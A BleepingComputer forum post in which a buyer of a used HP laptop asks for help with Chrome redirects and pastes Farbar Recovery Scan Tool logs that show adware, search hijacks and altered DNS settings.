Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Chrome Redirect Virus on "New" Laptop


  • This topic is locked This topic is locked
8 replies to this topic

#1 starblazers

starblazers

  • Members
  • 56 posts
  • OFFLINE
  •  
  • Local time:06:56 AM

Posted 22 March 2018 - 08:22 PM

Hi, I bought a used laptop at a thrift store and wanted to make sure it was clean of bugs and surprises before I started using it for anything.  So, I fire it up and see several programs I don't recognize on the desktop.  I uninstall them, and then fire up Chrome and try to come to Bleeping Computer to see about posting a topic requesting help,  While reading the Prep Guide on the website, the page redirects and starts warning about my computer being infected.  Also, not necessarily another problem, but I notice that the laptop seems to have three total hard drives, labeled as follows:

C: which has 233 GB free out of 277 GB

and

HP_RECOVERY (E:) which has 2.26 GB free out of 15.1 GB

and

HP_TOOLS (F:) which has 2.12 GB free out of 4.98 GB

 

So, what I would like to do, if possible, is get it free of bugs and such and then also wipe any other user profiles left behind by the previous owner.  I have never owned a laptop before, so I don't want to accidentally delete something I need in order to run the laptop.  Any and all help will be greatly appreciated.

FRST and Addition.txt files are as follows:

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 14.03.2018
Ran by Tech 14 (administrator) on MERIDIAN (21-03-2018 23:11:42)
Running from C:\Users\Tech 14\Desktop
Loaded Profiles: Tech 14 (Available Profiles: Tech 14)
Platform: Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Google Inc.) C:\Users\Tech 14\AppData\Local\Google\Update\GoogleUpdate.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP QuickWeb\hpqwutils.exe
(Sun Microsystems, Inc.) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Andrea Electronics Corporation) C:\Program Files\IDT\WDM\AESTSr64.exe
(Intel Corporation) C:\Program Files\Intel\BluetoothHS\BTHSAmpPalService.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft\BingBar\SeaPort.EXE
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe
(Intel® Corporation) C:\Program Files\Intel\BluetoothHS\BTHSSecurityMgr.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\HPDrvMntSvc.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Ericsson AB) C:\Program Files (x86)\Ericsson\Mobile Broadband Drivers\WMCore\mini_WMCore.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\CVHSVC.EXE
(Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\mediasrv.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqWmiEx.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\btplayerctrl.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Sun Microsystems, Inc.) C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2837288 2011-10-14] (Synaptics Incorporated)
HKLM\...\Run: [BTMTrayAgent] => rundll32.exe "C:\Program Files (x86)\Intel\Bluetooth\btmshell.dll",TrayApp
HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1128448 2011-06-30] (IDT, Inc.)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1271072 2014-03-11] (Microsoft Corporation)
HKLM-x32\...\Run: [PDF Complete] => C:\Program Files (x86)\PDF Complete\pdfsty.exe
HKLM-x32\...\Run: [HPOSD] => C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe [379960 2011-08-19] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [574008 2011-07-11] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [336384 2011-06-29] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [HPQuickWebProxy] => c:\Program Files (x86)\Hewlett-Packard\HP QuickWeb\hpqwutils.exe [169528 2011-09-01] (Hewlett-Packard Company)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [252296 2012-01-17] (Sun Microsystems, Inc.)
HKLM-x32\...\Run: [mobilegeni daemon] => C:\Program Files (x86)\Mobogenie\DaemonProcess.exe*******************************************************************************
HKU\S-1-5-21-893956484-597186715-3571521862-1000\...\Run: [Google Update] => C:\Users\Tech 14\AppData\Local\Google\Update\GoogleUpdate.exe [116648 2012-06-15] (Google Inc.)
HKU\S-1-5-21-893956484-597186715-3571521862-1000\...\Run: [NextLive] => C:\windows\SysWOW64\rundll32.exe "C:\Users\Tech 14\AppData\Roaming\newnext.me\nengine.dll",EntryPoint -m l
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\Parameters: [NameServer] 199.203.131.151 82.163.143.181
Tcpip\..\Interfaces\{28414285-8C2B-4927-8707-AA2B9B7FB204}: [NameServer] 199.203.131.151 82.163.143.181
Tcpip\..\Interfaces\{28414285-8C2B-4927-8707-AA2B9B7FB204}: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{5286B5CE-14A3-436C-9257-AEA9C72C576A}: [NameServer] 199.203.131.151 82.163.143.181
Tcpip\..\Interfaces\{5286B5CE-14A3-436C-9257-AEA9C72C576A}: [DhcpNameServer] 199.203.131.151
Tcpip\..\Interfaces\{5E3F2DF1-D74F-4019-83CD-DBE6FEFAEAD3}: [NameServer] 199.203.131.151 82.163.143.181
Tcpip\..\Interfaces\{5E3F2DF1-D74F-4019-83CD-DBE6FEFAEAD3}: [DhcpNameServer] 199.203.131.151
Tcpip\..\Interfaces\{EB149C09-0ED4-4B3D-A3A2-FCB4397AF082}: [NameServer] 172.26.38.1 172.26.38.2

Internet Explorer:
==================
HKU\S-1-5-21-893956484-597186715-3571521862-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://search.conduit.com/?ctid=CT3317819&octid=EB_ORIGINAL_CTID&SearchSource=55&CUI=&UM=2&UP=SP9F570C5C-3FC4-4419-94F5-D8F29864BBC5&SSPV=
HKU\S-1-5-21-893956484-597186715-3571521862-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPCOM/1
SearchScopes: HKLM -> DefaultScope {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=CMNTDF&pc=CMNTDF&src=IE-SearchBox
SearchScopes: HKLM -> {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL =
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=CMNTDF
SearchScopes: HKLM -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=CMNTDF
SearchScopes: HKLM -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = hxxp://rover.ebay.com/rover/1/711-30572-11896-24/4?satitle={searchTerms}
SearchScopes: HKLM -> {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=CMNTDF&pc=CMNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> DefaultScope {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=CMNTDF&pc=CMNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=CMNTDF
SearchScopes: HKLM-x32 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=CMNTDF
SearchScopes: HKLM-x32 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = hxxp://rover.ebay.com/rover/1/711-30572-11896-24/4?satitle={searchTerms}
SearchScopes: HKLM-x32 -> {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=CMNTDF&pc=CMNTDF&src=IE-SearchBox
SearchScopes: HKU\.DEFAULT -> DefaultScope {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxp://search.conduit.com/Results.aspx?ctid=CT3317819&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=2&UP=SP9F570C5C-3FC4-4419-94F5-D8F29864BBC5&q={searchTerms}&SSPV=
SearchScopes: HKU\.DEFAULT -> {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxp://search.conduit.com/Results.aspx?ctid=CT3317819&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=2&UP=SP9F570C5C-3FC4-4419-94F5-D8F29864BBC5&q={searchTerms}&SSPV=
SearchScopes: HKU\.DEFAULT -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL =
SearchScopes: HKU\S-1-5-21-893956484-597186715-3571521862-1000 -> DefaultScope {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxp://search.conduit.com/Results.aspx?ctid=CT3317819&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=2&UP=SP9F570C5C-3FC4-4419-94F5-D8F29864BBC5&q={searchTerms}&SSPV=
SearchScopes: HKU\S-1-5-21-893956484-597186715-3571521862-1000 -> {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxp://search.conduit.com/Results.aspx?ctid=CT3317819&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=2&UP=SP9F570C5C-3FC4-4419-94F5-D8F29864BBC5&q={searchTerms}&SSPV=
SearchScopes: HKU\S-1-5-21-893956484-597186715-3571521862-1000 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=CMNTDF
SearchScopes: HKU\S-1-5-21-893956484-597186715-3571521862-1000 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=CMNTDF
SearchScopes: HKU\S-1-5-21-893956484-597186715-3571521862-1000 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = hxxp://rover.ebay.com/rover/1/711-30572-11896-24/4?satitle={searchTerms}
SearchScopes: HKU\S-1-5-21-893956484-597186715-3571521862-1000 -> {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=CMNTDF&pc=CMNTDF&src=IE-SearchBox
BHO: Plus-HD-1.2 -> {11111111-1111-1111-1111-110311121155} -> C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-bho64.dll [2013-12-22] (Plus HD)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2010-09-21] (Microsoft Corp.)
BHO: llEsss2pay -> {A555676B-2A0B-9B19-8CC1-D4ED88AC8618} -> C:\ProgramData\llEsss2pay\GZ5hjc9kDO.x64.dll [2014-04-22] ()
BHO-x32: Plus-HD-1.2 -> {11111111-1111-1111-1111-110311121155} -> C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-bho.dll [2013-12-22] (Plus HD)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Oracle\JavaFX 2.1 Runtime\bin\ssv.dll [2012-04-04] (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2010-09-21] (Microsoft Corp.)
BHO-x32: llEsss2pay -> {A555676B-2A0B-9B19-8CC1-D4ED88AC8618} -> C:\ProgramData\llEsss2pay\GZ5hjc9kDO.dll [2014-04-22] ()
BHO-x32: Bing Bar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files (x86)\Microsoft\BingBar\BingExt.dll [2011-08-01] (Microsoft Corporation.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Oracle\JavaFX 2.1 Runtime\bin\jp2ssv.dll [2012-04-04] (Oracle Corporation)
Toolbar: HKLM-x32 - Bing Bar - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files (x86)\Microsoft\BingBar\BingExt.dll [2011-08-01] (Microsoft Corporation.)
Toolbar: HKU\S-1-5-21-893956484-597186715-3571521862-1000 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} -  No File
DPF: HKLM-x32 {F27237D7-93C8-44C2-AC6E-D6057B9A918F} hxxps://vendoraccess.twcable.com/dana-cached/sc/JuniperSetupClient.cab

FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30214.0\npctrl.dll [2014-02-13] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\windows\system32\Adobe\Director\np32dsw.dll [No File]
FF Plugin-x32: @java.com/DTPlugin,version=10.4.1 -> C:\windows\SysWOW64\npDeployJava1.dll [2012-04-04] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.4.1 -> C:\Program Files (x86)\Oracle\JavaFX 2.1 Runtime\bin\plugin2\npjp2.dll [2012-04-04] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30214.0\npctrl.dll [2014-02-13] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-11-10] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-11-10] (Microsoft Corporation)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [2010-12-07] ()
FF Plugin HKU\S-1-5-21-893956484-597186715-3571521862-1000: @tools.google.com/Google Update;version=3 -> C:\Users\Tech 14\AppData\Local\Google\Update\1.3.23.9\npGoogleUpdate3.dll [2014-04-22] (Google Inc.)
FF Plugin HKU\S-1-5-21-893956484-597186715-3571521862-1000: @tools.google.com/Google Update;version=9 -> C:\Users\Tech 14\AppData\Local\Google\Update\1.3.23.9\npGoogleUpdate3.dll [2014-04-22] (Google Inc.)

Chrome:
=======
CHR DefaultProfile: Default
StartMenuInternet: Google Chrome - C:\Users\Tech 14\AppData\Local\Google\Chrome\Application\chrome.exe

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 ACDaemon; C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe [113152 2010-03-18] (ArcSoft Inc.)
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1364096 2016-05-25] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1687680 2016-05-25] (Microsoft Corporation)
R2 HP Support Assistant Service; C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe [86528 2012-09-27] (Hewlett-Packard Company) [File not signed]
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23808 2014-03-11] (Microsoft Corporation)
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [347872 2014-03-11] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
R2 WMCoreService; C:\Program Files (x86)\Ericsson\Mobile Broadband Drivers\WMCore\mini_WMCore.exe [652328 2011-09-13] (Ericsson AB)
S2 pdfcDispatcher; C:\Program Files (x86)\PDF Complete\pdfsvc.exe /startedbyscm:66B66708-40E2BE4D-pdfcService [X] <==== ATTENTION

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 ecnssndis; C:\windows\System32\Drivers\wwuss64.sys [26664 2011-09-05] (Ericsson AB)
R3 ecnssndisfltr; C:\windows\System32\Drivers\wwussf64.sys [29736 2011-09-05] (Ericsson AB)
R3 h36wgps; C:\windows\System32\DRIVERS\h36wgps64.sys [102440 2011-09-06] (Ericsson AB)
R3 Mbm3CBus; C:\windows\System32\DRIVERS\Mbm3CBus.sys [419400 2011-08-22] (MCCI Corporation)
R3 Mbm3DevMt; C:\windows\System32\DRIVERS\Mbm3DevMt.sys [430664 2011-08-22] (MCCI Corporation)
R3 Mbm3mdfl; C:\windows\System32\DRIVERS\Mbm3mdfl.sys [19528 2011-08-22] (MCCI Corporation)
R3 Mbm3Mdm; C:\windows\System32\DRIVERS\Mbm3Mdm.sys [483400 2011-08-22] (MCCI Corporation)
R0 MpFilter; C:\windows\System32\DRIVERS\MpFilter.sys [268512 2014-01-25] (Microsoft Corporation)
R2 NisDrv; C:\windows\System32\DRIVERS\NisDrvWFP.sys [133928 2014-03-11] (Microsoft Corporation)
R3 WwanUsbServ; C:\windows\System32\DRIVERS\WwanUsbMp64.sys [279080 2011-09-07] (Ericsson AB)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-03-21 23:11 - 2018-03-21 23:13 - 000017873 _____ C:\Users\Tech 14\Desktop\FRST.txt
2018-03-21 23:11 - 2018-03-21 23:11 - 000000000 ____D C:\FRST
2018-03-21 23:09 - 2018-03-21 23:09 - 002403328 _____ (Farbar) C:\Users\Tech 14\Desktop\FRST64.exe
2018-03-21 12:53 - 2018-03-21 12:53 - 000000000 ____D C:\Users\Tech 14\AppData\Local\Xobni

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-03-21 23:10 - 2009-07-14 00:45 - 000028576 ____H C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2018-03-21 23:10 - 2009-07-14 00:45 - 000028576 ____H C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2018-03-21 23:05 - 2012-06-15 09:59 - 000000916 _____ C:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-893956484-597186715-3571521862-1000UA.job
2018-03-21 23:03 - 2013-12-22 20:14 - 000001332 _____ C:\windows\Tasks\Plus-HD-1.2-updater.job
2018-03-21 23:03 - 2013-12-22 20:14 - 000001134 _____ C:\windows\Tasks\Plus-HD-1.2-enabler.job
2018-03-21 23:03 - 2013-12-22 20:13 - 000001234 _____ C:\windows\Tasks\Plus-HD-1.2-codedownloader.job
2018-03-21 23:03 - 2013-12-22 20:12 - 000002108 _____ C:\windows\Tasks\Plus-HD-1.2-firefoxinstaller.job
2018-03-21 23:03 - 2013-12-22 20:11 - 000001980 _____ C:\windows\Tasks\Plus-HD-1.2-chromeinstaller.job
2018-03-21 23:02 - 2009-07-14 01:08 - 000000006 ____H C:\windows\Tasks\SA.DAT
2018-03-21 22:15 - 2012-04-23 10:26 - 000003938 _____ C:\windows\System32\Tasks\User_Feed_Synchronization-{E55834A3-33FF-4B6A-BAAC-C0C048D6F970}
2018-03-21 13:12 - 2013-12-22 20:11 - 000000000 ____D C:\Program Files (x86)\MyPC Backup
2018-03-21 13:09 - 2012-09-05 15:56 - 000000000 ___RD C:\Program Files (x86)\Skype
2018-03-21 13:09 - 2012-09-05 15:56 - 000000000 ____D C:\ProgramData\Skype
2018-03-21 12:57 - 2013-12-23 11:29 - 000000000 ____D C:\Users\Tech 14\AppData\LocalLow\Plus-HD-1.2
2018-03-21 12:52 - 2013-12-22 20:14 - 000000000 ____D C:\Users\Tech 14\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Mobogenie
2018-03-21 12:52 - 2013-12-22 20:14 - 000000000 ____D C:\Users\Tech 14\AppData\Local\Mobogenie
2018-03-21 12:50 - 2012-06-15 10:25 - 000000000 ____D C:\Users\Tech 14\AppData\Local\PokerStars.NET
2018-03-21 12:50 - 2012-06-15 10:25 - 000000000 ____D C:\Program Files (x86)\PokerStars.NET
2018-03-21 12:41 - 2013-12-22 20:12 - 000000000 ____D C:\ProgramData\TEMP
2018-03-21 12:13 - 2012-09-05 15:57 - 000000000 ____D C:\Users\Tech 14\AppData\Roaming\Skype
2018-03-19 18:27 - 2013-12-22 20:14 - 000008059 _____ C:\Users\Tech 14\daemonprocess.txt
2018-03-19 18:27 - 2012-08-30 18:08 - 000000000 ____D C:\Users\Tech 14\AppData\Roaming\SoftGrid Client
2018-03-19 15:45 - 2016-07-18 23:52 - 000000000 ____D C:\ProgramData\{0b6c3ba4-10c8-1}
2018-03-19 15:45 - 2016-07-18 23:52 - 000000000 ____D C:\ProgramData\{0a376664-50c8-0}

Some files in TEMP:
====================
2013-02-06 17:29 - 2013-02-06 17:29 - 000000000 _____ () C:\Users\Tech 14\AppData\Local\Temp\.exe
2013-02-06 17:29 - 2013-02-06 17:30 - 000143240 _____ (Ask.com) C:\Users\Tech 14\AppData\Local\Temp\ApnStub.exe
2013-12-22 20:10 - 2013-12-22 20:10 - 010355400 _____ () C:\Users\Tech 14\AppData\Local\Temp\BackupSetup.exe
2014-04-25 17:10 - 2014-04-25 17:10 - 000565760 _____ (Appcaster) C:\Users\Tech 14\AppData\Local\Temp\D2M-Precheck.exe
2012-07-11 10:36 - 2012-07-11 10:37 - 022413696 _____ (Microsoft Corporation) C:\Users\Tech 14\AppData\Local\Temp\IPx64_1033.exe
2013-12-16 05:01 - 2013-12-16 05:01 - 000167812 _____ (Conduit) C:\Users\Tech 14\AppData\Local\Temp\nsf4A0E.exe
2013-12-16 05:01 - 2013-12-16 05:01 - 000167812 _____ (Conduit) C:\Users\Tech 14\AppData\Local\Temp\nsk3D60.exe
2013-12-16 05:01 - 2013-12-16 05:01 - 000167812 _____ (Conduit) C:\Users\Tech 14\AppData\Local\Temp\nsk73F9.exe
2014-04-08 09:06 - 2014-04-08 09:06 - 000156063 _____ (Conduit) C:\Users\Tech 14\AppData\Local\Temp\nskD972.exe
2013-12-16 05:01 - 2013-12-16 05:01 - 000167812 _____ (Conduit) C:\Users\Tech 14\AppData\Local\Temp\nsu5E94.exe
2013-04-30 15:56 - 2013-06-18 18:43 - 031668328 _____ (Skype Technologies S.A.) C:\Users\Tech 14\AppData\Local\Temp\SkypeSetup.exe
2013-11-07 21:20 - 2013-11-07 21:20 - 041580520 _____ (Hewlett-Packard                                             ) C:\Users\Tech 14\AppData\Local\Temp\sp58915.exe
2014-04-08 16:07 - 2014-04-08 16:07 - 006379728 _____ (Conduit) C:\Users\Tech 14\AppData\Local\Temp\SPSetup.exe
2013-11-07 21:21 - 2012-09-27 14:44 - 000114080 ____N (Hewlett-Packard Company) C:\Users\Tech 14\AppData\Local\Temp\UninstallHPSA.exe
2016-07-17 00:03 - 2016-07-17 00:03 - 000780800 _____ (Emirates) C:\Users\Tech 14\AppData\Local\Temp\upd70819.exe
2018-03-21 12:49 - 2012-06-15 10:37 - 000348160 _____ () C:\Users\Tech 14\AppData\Local\Temp\_unps.exe

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\windows\system32\winlogon.exe => File is digitally signed
C:\windows\system32\wininit.exe => File is digitally signed
C:\windows\SysWOW64\wininit.exe => File is digitally signed
C:\windows\explorer.exe => File is digitally signed
C:\windows\SysWOW64\explorer.exe => File is digitally signed
C:\windows\system32\svchost.exe => File is digitally signed
C:\windows\SysWOW64\svchost.exe => File is digitally signed
C:\windows\system32\services.exe => File is digitally signed
C:\windows\system32\User32.dll => File is digitally signed
C:\windows\SysWOW64\User32.dll => File is digitally signed
C:\windows\system32\userinit.exe => File is digitally signed
C:\windows\SysWOW64\userinit.exe => File is digitally signed
C:\windows\system32\rpcss.dll => File is digitally signed
C:\windows\system32\dnsapi.dll => File is digitally signed
C:\windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2013-12-21 01:10

==================== End of FRST.txt ============================



Additional scan result of Farbar Recovery Scan Tool (x64) Version: 14.03.2018
Ran by Tech 14 (21-03-2018 23:14:46)
Running from C:\Users\Tech 14\Desktop
Windows 7 Home Premium Service Pack 1 (X64) (2012-04-23 14:08:30)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-893956484-597186715-3571521862-500 - Administrator - Disabled)
Guest (S-1-5-21-893956484-597186715-3571521862-501 - Limited - Disabled)
Tech 14 (S-1-5-21-893956484-597186715-3571521862-1000 - Administrator - Enabled) => C:\Users\Tech 14

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Microsoft Security Essentials (Enabled - Up to date) {641105E6-77ED-3F35-A304-765193BCB75F}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Microsoft Security Essentials (Enabled - Up to date) {DF70E402-51D7-30BB-99B4-4D23E83BFDE2}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

